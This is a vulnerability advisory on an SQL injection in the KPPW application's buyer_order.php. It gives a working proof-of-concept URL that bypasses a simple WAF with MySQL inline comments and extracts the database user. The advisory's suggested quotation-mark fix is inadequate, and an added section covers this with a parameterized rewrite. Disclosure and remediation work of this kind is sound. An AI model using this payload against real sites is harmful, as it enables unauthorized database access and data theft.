KPPW latest SQL injection vulnerability 1
File: /control/gy/buyer_order.php

switch ($step) {
    // ...
    case 'step5':
        if ($arrServiceOrderInfo['workfile']) {
            // the untrusted 'workfile' value is concatenated straight into the IN(...) list
            $arrFileLists = db_factory::query('select file_name,save_name from ' . TABLEPRE . 'witkey_file where file_id in(' . $arrServiceOrderInfo['workfile'] . ')');
        }
        if (isset($action)) {
            switch ($action) {
                case 'access':
                    $objShop = new service_shop_class();
                    $resText = $objShop->dispose_order($orderId, 'complete');
                    unset($objShop);
                    if (true === $resText) {
                        kekezu::show_msg('Order processed, this order is completed', $strUrl . "&step=step6&orderId=" . $orderId, 3, null, 'OK');
                    } else {
                        kekezu::show_msg($resText, null, 'fail');
                    }
                    break;
                default:
                    kekezu::show_msg('The page you are accessing does not exist', 'index.php', 3, null, 'warning');
                    break;
            }
        }
        break;
Note:
if($arrServiceOrderInfo['workfile']){$arrFileLists = db_factory::query('select file_name,save_name from '.TABLEPRE.'witkey_file where file_id in('.$arrServiceOrderInfo['workfile'].')');}
$arrServiceOrderInfo['workfile'] is placed directly into the SQL statement, resulting in SQL injection.
Why is the injection exposed like this?
There is a WAF here, but it is very simple and can be bypassed with inline comments.
POC:
http://localhost/KPPW2520141118UTF-8/index.php?do=gy&view=buyer_order&step=step5&arrServiceOrderInfo[workfile]=123) and 1=2 /*!50000union*/ select 1,2 from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b%23
This leads to a blind injection.
View the MySQL execution log:
The statement bypasses the WAF and is executed.
View the execution result of this statement:
Because it is a blind injection, the data cannot be displayed directly. If you want to dump the data, you can use sqlmap.
Solution:
The variable $arrFileLists is not used here and I don't know what it is for; delete it.
Or protect the value with quotation marks.
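Quoting the value alone does not remove the injection (the ids are still concatenated into the statement) and turns the IN list into a single string, so the usual fix is to validate the value as a list of integers and bind it. The following is an added example, not KPPW's own code: it contrasts the vulnerable concatenation from the advisory with a hardened builder; TABLEPRE and the inputs are constructed assumptions.

```php
<?php
// Added example (not part of KPPW): building the "file_id in (...)" clause
// from an untrusted workfile value. The table prefix is an assumption.
const TABLEPRE = 'keke_';

// Vulnerable form, as in the advisory: raw string interpolation.
function buildFileQueryUnsafe(string $workfile): string
{
    return 'select file_name,save_name from ' . TABLEPRE
         . 'witkey_file where file_id in(' . $workfile . ')';
}

// Hardened form: accept only a comma-separated list of positive integers,
// reject everything else, and return SQL with '?' placeholders plus the
// bound values so it can be run as a prepared statement.
function buildFileQuerySafe(string $workfile): ?array
{
    if (!preg_match('/^\s*\d+(\s*,\s*\d+)*\s*$/', $workfile)) {
        return null;                               // not a plain id list: reject
    }
    $ids = array_map('intval', explode(',', $workfile));
    $ids = array_values(array_unique(array_filter($ids, fn ($i) => $i > 0)));
    if ($ids === []) {
        return null;
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = 'select file_name,save_name from ' . TABLEPRE
         . 'witkey_file where file_id in(' . $placeholders . ')';
    return [$sql, $ids];
}

// Constructed inputs: a legitimate id list and a value with a closing
// parenthesis and a comment marker, the shape the advisory's payload takes.
$inputs = [
    '12,34',
    '123) and 1=2 #',
];
foreach ($inputs as $in) {
    echo "input:  {$in}\n";
    echo "unsafe: " . buildFileQueryUnsafe($in) . "\n";
    $safe = buildFileQuerySafe($in);
    echo "safe:   " . ($safe === null
        ? 'REJECTED'
        : $safe[0] . ' with ' . json_encode($safe[1])) . "\n\n";
}
// Wiring into the page's code would be:
// $stmt = $pdo->prepare($sql); $stmt->execute($ids);   (assumed PDO connection)
```

The second input is rejected before any SQL is built, while the first yields a statement with two placeholders and the bound values [12, 34].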